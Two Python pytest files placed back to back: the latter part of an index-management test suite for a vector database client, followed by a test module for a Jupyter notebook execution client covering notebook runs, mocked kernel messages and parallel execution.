status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
def test_create_drop_index_repeatly_different_index_params(self, connect, ip_collection):
'''
target: test create / drop index repeatly, use the different index params
method: create index, drop index, four times, each tme use different index_params to create index
expected: return code 0
'''
nlist = NLIST
indexs = [{"index_type": IndexType.IVFLAT, "index_param": {"nlist": nlist}}, {"index_type": IndexType.IVF_SQ8, "index_param": {"nlist": nlist}}]
status, ids = connect.add_vectors(ip_collection, vectors)
for i in range(2):
status = connect.create_index(ip_collection, indexs[i]["index_type"], indexs[i]["index_param"])
assert status.OK()
status, result = connect.describe_index(ip_collection)
assert result._params == indexs[i]["index_param"]
assert result._collection_name == ip_collection
assert result._index_type == indexs[i]["index_type"]
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
class TestIndexJAC:
tmp, vectors = gen_binary_vectors(nb, dim)
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, jac_collection, get_jaccard_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
status, ids = connect.add_vectors(jac_collection, self.vectors)
status = connect.create_index(jac_collection, index_type, index_param)
if index_type != IndexType.FLAT and index_type != IndexType.IVFLAT:
assert not status.OK()
else:
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, jac_collection, get_jaccard_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
status = connect.create_partition(jac_collection, tag)
status, ids = connect.add_vectors(jac_collection, self.vectors, partition_tag=tag)
status = connect.create_index(jac_collection, index_type, index_param)
assert status.OK()
@pytest.mark.level(2)
def test_create_index_without_connect(self, dis_connect, jac_collection):
'''
target: test create index without connection
method: create collection and add vectors in it, check if added successfully
expected: raise exception
'''
nlist = NLIST
index_param = {"nlist": nlist}
with pytest.raises(Exception) as e:
status = dis_connect.create_index(jac_collection, IndexType.IVF_SQ8, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, jac_collection, get_jaccard_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
status, ids = connect.add_vectors(jac_collection, self.vectors)
status = connect.create_index(jac_collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(jac_collection))
query_vecs = [self.vectors[0], self.vectors[1], self.vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(jac_collection, top_k, query_vecs, params=search_param)
logging.getLogger().info(result)
assert status.OK()
assert len(result) == len(query_vecs)
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, jac_collection, get_jaccard_index):
'''
target: test describe index interface
method: create collection and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
# status, ids = connect.add_vectors(jac_collection, vectors[:5000])
status = connect.create_index(jac_collection, index_type, index_param)
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
assert result._collection_name == jac_collection
assert result._index_type == index_type
assert result._params == index_param
def test_describe_index_partition(self, connect, jac_collection, get_jaccard_index):
'''
target: test describe index interface
method: create collection, create partition and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
status = connect.create_partition(jac_collection, tag)
status, ids = connect.add_vectors(jac_collection, vectors, partition_tag=tag)
status = connect.create_index(jac_collection, index_type, index_param)
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == jac_collection
assert result._index_type == index_type
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, jac_collection, get_jaccard_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
status, mode = connect._cmd("mode")
assert status.OK()
# status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(jac_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
status = connect.drop_index(jac_collection)
assert status.OK()
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
assert result._collection_name == jac_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_partition(self, connect, jac_collection, get_jaccard_index):
'''
target: test drop index interface
method: create collection, create partition and add vectors in it, create index on collection, call drop collection index
expected: return code 0, and default index param
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
status = connect.create_partition(jac_collection, tag)
status, ids = connect.add_vectors(jac_collection, vectors, partition_tag=tag)
status = connect.create_index(jac_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
status = connect.drop_index(jac_collection)
assert status.OK()
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
assert result._collection_name == jac_collection
assert result._index_type == IndexType.FLAT
class TestIndexBinary:
tmp, vectors = gen_binary_vectors(nb, dim)
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if request.param["index_type"] == IndexType.IVF_PQ or request.param["index_type"] == IndexType.HNSW:
pytest.skip("Skip PQ Temporary")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if request.param["index_type"] == IndexType.IVF_PQ or request.param["index_type"] == IndexType.HNSW:
pytest.skip("Skip PQ Temporary")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_substructure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_superstructure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, ham_collection, get_hamming_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
status, ids = connect.add_vectors(ham_collection, self.vectors)
status = connect.create_index(ham_collection, index_type, index_param)
if index_type != IndexType.FLAT and index_type != IndexType.IVFLAT:
assert not status.OK()
else:
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, ham_collection, get_hamming_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
status = connect.create_partition(ham_collection, tag)
status, ids = connect.add_vectors(ham_collection, self.vectors, partition_tag=tag)
status = connect.create_index(ham_collection, index_type, index_param)
assert status.OK()
status, res = connect.count_collection(ham_collection)
assert res == len(self.vectors)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_structure(self, connect, substructure_collection, get_substructure_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_substructure_index["index_param"]
index_type = get_substructure_index["index_type"]
logging.getLogger().info(get_substructure_index)
status = connect.create_partition(substructure_collection, tag)
status, ids = connect.add_vectors(substructure_collection, self.vectors, partition_tag=tag)
status = connect.create_index(substructure_collection, index_type, index_param)
assert status.OK()
status, res = connect.count_collection(substructure_collection,)
assert res == len(self.vectors)
@pytest.mark.level(2)
def test_create_index_without_connect(self, dis_connect, ham_collection):
'''
target: test create index without connection
method: create collection and add vectors in it, check if added successfully
expected: raise exception
'''
nlist = NLIST
index_param = {"nlist": nlist}
with pytest.raises(Exception) as e:
status = dis_connect.create_index(ham_collection, IndexType.IVF_SQ8, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, ham_collection, get_hamming_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
status, ids = connect.add_vectors(ham_collection, self.vectors)
status = connect.create_index(ham_collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(ham_collection))
query_vecs = [self.vectors[0], self.vectors[1], self.vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(ham_collection, top_k, query_vecs, params=search_param)
logging.getLogger().info(result)
assert status.OK()
assert len(result) == len(query_vecs)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors_superstructure(self, connect, superstructure_collection, get_superstructure_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_superstructure_index["index_param"]
index_type = get_superstructure_index["index_type"]
logging.getLogger().info(get_superstructure_index)
status, ids = connect.add_vectors(superstructure_collection, self.vectors)
status = connect.create_index(superstructure_collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(superstructure_collection))
query_vecs = [self.vectors[0], self.vectors[1], self.vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(superstructure_collection, top_k, query_vecs, params=search_param)
logging.getLogger().info(result)
assert status.OK()
assert len(result) == len(query_vecs)
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, ham_collection, get_hamming_index):
'''
target: test describe index interface
method: create collection and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
# status, ids = connect.add_vectors(jac_collection, vectors[:5000])
status = connect.create_index(ham_collection, index_type, index_param)
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
assert result._collection_name == ham_collection
assert result._index_type == index_type
assert result._params == index_param
def test_describe_index_partition(self, connect, ham_collection, get_hamming_index):
'''
target: test describe index interface
method: create collection, create partition and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
status = connect.create_partition(ham_collection, tag)
status, ids = connect.add_vectors(ham_collection, vectors, partition_tag=tag)
status = connect.create_index(ham_collection, index_type, index_param)
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == ham_collection
assert result._index_type == index_type
def test_describe_index_partition_superstructrue(self, connect, superstructure_collection, get_superstructure_index):
'''
target: test describe index interface
method: create collection, create partition and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_param = get_superstructure_index["index_param"]
index_type = get_superstructure_index["index_type"]
logging.getLogger().info(get_superstructure_index)
status = connect.create_partition(superstructure_collection, tag)
status, ids = connect.add_vectors(superstructure_collection, vectors, partition_tag=tag)
status = connect.create_index(superstructure_collection, index_type, index_param)
status, result = connect.describe_index(superstructure_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == superstructure_collection
assert result._index_type == index_type
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, ham_collection, get_hamming_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
status, mode = connect._cmd("mode")
assert status.OK()
# status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ham_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
status = connect.drop_index(ham_collection)
assert status.OK()
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
assert result._collection_name == ham_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_substructure(self, connect, substructure_collection, get_substructure_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_substructure_index["index_param"]
index_type = get_substructure_index["index_type"]
status, mode = connect._cmd("mode")
assert status.OK()
status = connect.create_index(substructure_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(substructure_collection)
logging.getLogger().info(result)
status = connect.drop_index(substructure_collection)
assert status.OK()
status, result = connect.describe_index(substructure_collection)
logging.getLogger().info(result)
assert result._collection_name == substructure_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_partition(self, connect, ham_collection, get_hamming_index):
'''
target: test drop index interface
method: create collection, create partition and add vectors in it, create index on collection, call drop collection index
expected: return code 0, and default index param
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
status = connect.create_partition(ham_collection, tag)
status, ids = connect.add_vectors(ham_collection, vectors, partition_tag=tag)
status = connect.create_index(ham_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
status = connect.drop_index(ham_collection)
assert status.OK()
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
assert result._collection_name == ham_collection
assert result._index_type == IndexType.FLAT
class TestIndexCollectionInvalid(object):
"""
Test create / describe / drop index interfaces with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(1)
def test_create_index_with_invalid_collectionname(self, connect, get_collection_name):
collection_name = get_collection_name
nlist = NLIST
index_param = {"nlist": nlist}
status = connect.create_index(collection_name, IndexType.IVF_SQ8, index_param)
assert not status.OK()
@pytest.mark.level(1)
def test_describe_index_with_invalid_collectionname(self, connect, get_collection_name):
collection_name = get_collection_name
status, result = connect.describe_index(collection_name)
assert not status.OK()
@pytest.mark.level(1)
def test_drop_index_with_invalid_collectionname(self, connect, get_collection_name):
collection_name = get_collection_name
status = connect.drop_index(collection_name)
assert not status.OK()
class TestCreateIndexParamsInvalid(object):
"""
Test Building index with invalid collection names, collection names not in db
"""
@pytest.fixture(
scope="function",
params=gen_invalid_index()
)
def get_index(self, request):
yield request.param
@pytest.mark.level(1)
def test_create_index_with_invalid_index_params(self, connect, collection, get_index):
index_param = get_index["index_param"]
index_type = get_index["index_type"]
logging.getLogger().info(get_index)
# status, ids = connect.add_vectors(collection, vectors)
if (not index_type) or (not isinstance(index_type, IndexType)):
with pytest.raises(Exception) as e:
status = connect.create_index(collection, index_type, index_param)
else:
status = connect.create_index(collection, index_type, index_param)
assert not status.OK()
"""
Test Building index with invalid nlist
"""
@pytest.fixture(
scope="function",
params=[IndexType.FLAT,IndexType.IVFLAT,IndexType.IVF_SQ8,IndexType.IVF_SQ8H]
)
def get_index_type(self, request):
yield request.param
def test_create_index_with_invalid_nlist(self, connect, collection, get_index_type):
status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, get_index_type, {"nlist": INVALID_NLIST})
if get_index_type != IndexType.FLAT:
assert not status.OK()
'''
Test Building index with empty params
'''
def test_create_index_with_empty_param(self, connect, collection, get_index_type):
logging.getLogger().info(get_index_type)
status = connect.create_index(collection, get_index_type, {})
if get_index_type != IndexType.FLAT :
assert not status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
|
test_client.py
|
import asyncio
import concurrent.futures
import copy
import datetime
import functools
import os
import re
import threading
import warnings
from base64 import b64decode, b64encode
from queue import Empty
from unittest.mock import MagicMock, Mock
import nbformat
import pytest
import xmltodict # type: ignore
from ipython_genutils.py3compat import string_types
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager
from nbconvert.filters import strip_ansi # type: ignore
from nbformat import NotebookNode
from testpath import modified_env # type: ignore
from traitlets import TraitError
from .. import NotebookClient, execute
from ..exceptions import CellExecutionError
from .base import NBClientTestsBase
addr_pat = re.compile(r'0x[0-9a-f]{7,9}')
current_dir = os.path.dirname(__file__)
ipython_input_pat = re.compile(
r'(<ipython-input-\d+-[0-9a-f]+>|<IPY-INPUT>) in (<module>|<cell line: \d>\(\))'
)
# Tracebacks look different in IPython 8,
# see: https://github.com/ipython/ipython/blob/master/docs/source/whatsnew/version8.rst#traceback-improvements # noqa
ipython8_input_pat = re.compile(
r'(Input In \[\d+\]|<IPY-INPUT>), in (<module>|<cell line: \d>\(\))'
)
hook_methods = [
"on_cell_start",
"on_cell_execute",
"on_cell_complete",
"on_cell_error",
"on_notebook_start",
"on_notebook_complete",
"on_notebook_error",
]
class AsyncMock(Mock):
pass
def make_async(mock_value):
async def _():
return mock_value
return _()
def normalize_base64(b64_text):
# if it's base64, pass it through b64 decode/encode to avoid
# equivalent values from being considered unequal
try:
return b64encode(b64decode(b64_text.encode('ascii'))).decode('ascii')
except (ValueError, TypeError):
return b64_text
def run_notebook(filename, opts, resources=None):
"""Loads and runs a notebook, returning both the version prior to
running it and the version after running it.
"""
with open(filename) as f:
input_nb = nbformat.read(f, 4)
cleaned_input_nb = copy.deepcopy(input_nb)
for cell in cleaned_input_nb.cells:
if 'execution_count' in cell:
del cell['execution_count']
cell['outputs'] = []
if resources:
opts = {'resources': resources, **opts}
executor = NotebookClient(cleaned_input_nb, **opts)
with warnings.catch_warnings():
# suppress warning from jupyter_client's deprecated cleanup()
warnings.simplefilter(action='ignore', category=FutureWarning)
# Override terminal size to standardise traceback format
with modified_env({'COLUMNS': '80', 'LINES': '24'}):
output_nb = executor.execute()
return input_nb, output_nb
def run_notebook_wrapper(args):
# since concurrent.futures.ProcessPoolExecutor doesn't have starmap,
# we need to unpack the arguments
return run_notebook(*args)
async def async_run_notebook(filename, opts, resources=None):
"""Loads and runs a notebook, returning both the version prior to
running it and the version after running it.
"""
with open(filename) as f:
input_nb = nbformat.read(f, 4)
cleaned_input_nb = copy.deepcopy(input_nb)
for cell in cleaned_input_nb.cells:
if 'execution_count' in cell:
del cell['execution_count']
cell['outputs'] = []
if resources:
opts = {'resources': resources, **opts}
executor = NotebookClient(cleaned_input_nb, **opts)
# Override terminal size to standardise traceback format
with modified_env({'COLUMNS': '80', 'LINES': '24'}):
output_nb = await executor.async_execute()
return input_nb, output_nb
def prepare_cell_mocks(*messages, reply_msg=None):
"""
This function prepares a executor object which has a fake kernel client
to mock the messages sent over zeromq. The mock kernel client will return
the messages passed into this wrapper back from ``preproc.kc.iopub_channel.get_msg``
callbacks. It also appends a kernel idle message to the end of messages.
"""
parent_id = 'fake_id'
messages = list(messages)
# Always terminate messages with an idle to exit the loop
messages.append({'msg_type': 'status', 'content': {'execution_state': 'idle'}})
def shell_channel_message_mock():
# Return the message generator for
# self.kc.shell_channel.get_msg => {'parent_header': {'msg_id': parent_id}}
return AsyncMock(
return_value=make_async(
NBClientTestsBase.merge_dicts(
{
'parent_header': {'msg_id': parent_id},
'content': {'status': 'ok', 'execution_count': 1},
},
reply_msg or {},
)
)
)
def iopub_messages_mock():
# Return the message generator for
# self.kc.iopub_channel.get_msg => messages[i]
return AsyncMock(
side_effect=[
# Default the parent_header so mocks don't need to include this
make_async(
NBClientTestsBase.merge_dicts({'parent_header': {'msg_id': parent_id}}, msg)
)
for msg in messages
]
)
def prepared_wrapper(func):
@functools.wraps(func)
def test_mock_wrapper(self):
"""
This inner function wrapper populates the executor object with
the fake kernel client. This client has its iopub and shell
channels mocked so as to fake the setup handshake and return
the messages passed into prepare_cell_mocks as the execute_cell loop
processes them.
"""
cell_mock = NotebookNode(
source='"foo" = "bar"', metadata={}, cell_type='code', outputs=[]
)
executor = NotebookClient({})
executor.nb = {'cells': [cell_mock]}
# self.kc.iopub_channel.get_msg => message_mock.side_effect[i]
message_mock = iopub_messages_mock()
executor.kc = MagicMock(
iopub_channel=MagicMock(get_msg=message_mock),
shell_channel=MagicMock(get_msg=shell_channel_message_mock()),
execute=MagicMock(return_value=parent_id),
is_alive=MagicMock(return_value=make_async(True)),
)
executor.parent_id = parent_id
return func(self, executor, cell_mock, message_mock)
return test_mock_wrapper
return prepared_wrapper
def normalize_output(output):
"""
Normalizes outputs for comparison.
"""
output = dict(output)
if 'metadata' in output:
del output['metadata']
if 'text' in output:
output['text'] = re.sub(addr_pat, '<HEXADDR>', output['text'])
if 'text/plain' in output.get('data', {}):
output['data']['text/plain'] = re.sub(addr_pat, '<HEXADDR>', output['data']['text/plain'])
if 'application/vnd.jupyter.widget-view+json' in output.get('data', {}):
output['data']['application/vnd.jupyter.widget-view+json']['model_id'] = '<MODEL_ID>'
if 'image/svg+xml' in output.get('data', {}):
output['data']['image/svg+xml'] = xmltodict.parse(output['data']['image/svg+xml'])
for key, value in output.get('data', {}).items():
if isinstance(value, string_types):
output['data'][key] = normalize_base64(value)
if 'traceback' in output:
tb = []
for line in output["traceback"]:
line = re.sub(ipython_input_pat, '<IPY-INPUT>', strip_ansi(line))
line = re.sub(ipython8_input_pat, '<IPY-INPUT>', strip_ansi(line))
tb.append(line)
output['traceback'] = tb
return output
def assert_notebooks_equal(expected, actual):
expected_cells = expected['cells']
actual_cells = actual['cells']
assert len(expected_cells) == len(actual_cells)
for expected_cell, actual_cell in zip(expected_cells, actual_cells):
# Uncomment these to help debug test failures better
# from pprint import pprint
# pprint(expected_cell)
# pprint(actual_cell)
expected_outputs = expected_cell.get('outputs', [])
actual_outputs = actual_cell.get('outputs', [])
normalized_expected_outputs = list(map(normalize_output, expected_outputs))
normalized_actual_outputs = list(map(normalize_output, actual_outputs))
assert normalized_expected_outputs == normalized_actual_outputs
expected_execution_count = expected_cell.get('execution_count', None)
actual_execution_count = actual_cell.get('execution_count', None)
assert expected_execution_count == actual_execution_count
def notebook_resources():
"""
Prepare a notebook resources dictionary for executing test
notebooks in the ``files`` folder.
"""
return {'metadata': {'path': os.path.join(current_dir, 'files')}}
def filter_messages_on_error_output(err_output):
allowed_lines = [
# ipykernel migh be installed without debugpy extension
"[IPKernelApp] WARNING | debugpy_stream undefined, debugging will not be enabled",
]
filtered_result = [line for line in err_output.splitlines() if line not in allowed_lines]
return os.linesep.join(filtered_result)
@pytest.mark.parametrize(
["input_name", "opts"],
[
("Other Comms.ipynb", dict(kernel_name="python")),
("Clear Output.ipynb", dict(kernel_name="python")),
("Empty Cell.ipynb", dict(kernel_name="python")),
("Factorials.ipynb", dict(kernel_name="python")),
("HelloWorld.ipynb", dict(kernel_name="python")),
("Inline Image.ipynb", dict(kernel_name="python")),
(
"Interrupt.ipynb",
dict(kernel_name="python", timeout=1, interrupt_on_timeout=True, allow_errors=True),
),
("JupyterWidgets.ipynb", dict(kernel_name="python")),
("Skip Exceptions with Cell Tags.ipynb", dict(kernel_name="python")),
("Skip Exceptions.ipynb", dict(kernel_name="python", allow_errors=True)),
("Skip Execution with Cell Tag.ipynb", dict(kernel_name="python")),
("SVG.ipynb", dict(kernel_name="python")),
("Unicode.ipynb", dict(kernel_name="python")),
("UnicodePy3.ipynb", dict(kernel_name="python")),
("update-display-id.ipynb", dict(kernel_name="python")),
("Check History in Memory.ipynb", dict(kernel_name="python")),
],
)
def test_run_all_notebooks(input_name, opts):
"""Runs a series of test notebooks and compares them to their actual output"""
input_file = os.path.join(current_dir, 'files', input_name)
input_nb, output_nb = run_notebook(input_file, opts, notebook_resources())
assert_notebooks_equal(input_nb, output_nb)
def test_parallel_notebooks(capfd, tmpdir):
"""Two notebooks should be able to be run simultaneously without problems.
The two notebooks spawned here use the filesystem to check that the other notebook
wrote to the filesystem."""
opts = dict(kernel_name="python")
input_name = "Parallel Execute {label}.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = notebook_resources()
with modified_env({"NBEXECUTE_TEST_PARALLEL_TMPDIR": str(tmpdir)}):
threads = [
threading.Thread(target=run_notebook, args=(input_file.format(label=label), opts, res))
for label in ("A", "B")
]
[t.start() for t in threads]
[t.join(timeout=2) for t in threads]
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_many_parallel_notebooks(capfd):
"""Ensure that when many IPython kernels are run in parallel, nothing awful happens.
Specifically, many IPython kernels when run simultaneously would encounter errors
due to using the same SQLite history database.
"""
opts = dict(kernel_name="python", timeout=5)
input_name = "HelloWorld.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = NBClientTestsBase().build_resources()
res["metadata"]["path"] = os.path.join(current_dir, "files")
with warnings.catch_warnings():
# suppress warning from jupyter_client's deprecated cleanup()
warnings.simplefilter(action='ignore', category=FutureWarning)
# run once, to trigger creating the original context
run_notebook(input_file, opts, res)
with concurrent.futures.ProcessPoolExecutor(max_workers=2) as executor:
executor.map(run_notebook_wrapper, [(input_file, opts, res) for i in range(8)])
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_async_parallel_notebooks(capfd, tmpdir):
"""Two notebooks should be able to be run simultaneously without problems.
The two notebooks spawned here use the filesystem to check that the other notebook
wrote to the filesystem."""
opts = dict(kernel_name="python")
input_name = "Parallel Execute {label}.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = notebook_resources()
with modified_env({"NBEXECUTE_TEST_PARALLEL_TMPDIR": str(tmpdir)}):
tasks = [
async_run_notebook(input_file.format(label=label), opts, res) for label in ("A", "B")
]
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.gather(*tasks))
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_many_async_parallel_notebooks(capfd):
"""Ensure that when many IPython kernels are run in parallel, nothing awful happens.
Specifically, many IPython kernels when run simultaneously would encounter errors
due to using the same SQLite history database.
"""
opts = dict(kernel_name="python", timeout=5)
input_name = "HelloWorld.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = NBClientTestsBase().build_resources()
res["metadata"]["path"] = os.path.join(current_dir, "files")
# run once, to trigger creating the original context
run_notebook(input_file, opts, res)
tasks = [async_run_notebook(input_file, opts, res) for i in range(4)]
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.gather(*tasks))
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_execution_timing():
"""Compare the execution timing information stored in the cell with the
actual time it took to run the cell. Also check for the cell timing string
format."""
opts = dict(kernel_name="python")
input_name = "Sleep1s.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = notebook_resources()
input_nb, output_nb = run_notebook(input_file, opts, res)
def get_time_from_str(s):
time_format = '%Y-%m-%dT%H:%M:%S.%fZ'
return datetime.datetime.strptime(s, time_format)
execution_timing = output_nb['cells'][1]['metadata']['execution']
status_busy = get_time_from_str(execution_timing['iopub.status.busy'])
execute_input = get_time_from_str(execution_timing['iopub.execute_input'])
execute_reply = get_time_from_str(execution_timing['shell.execute_reply'])
status_idle = get_time_from_str(execution_timing['iopub.status.idle'])
cell_start = get_time_from_str(output_nb['cells'][2]['outputs'][0]['text'])
cell_end = get_time_from_str(output_nb['cells'][3]['outputs'][0]['text'])
delta = datetime.timedelta(milliseconds=100)
assert status_busy - cell_start < delta
assert execute_input - cell_start < delta
assert execute_reply - cell_end < delta
assert status_idle - cell_end < delta
def test_synchronous_setup_kernel():
nb = nbformat.v4.new_notebook()
executor = NotebookClient(nb)
with executor.setup_kernel():
# Prove it initialized client
assert executor.kc is not None
# Prove it removed the client (and hopefully cleaned up)
assert executor.kc is None
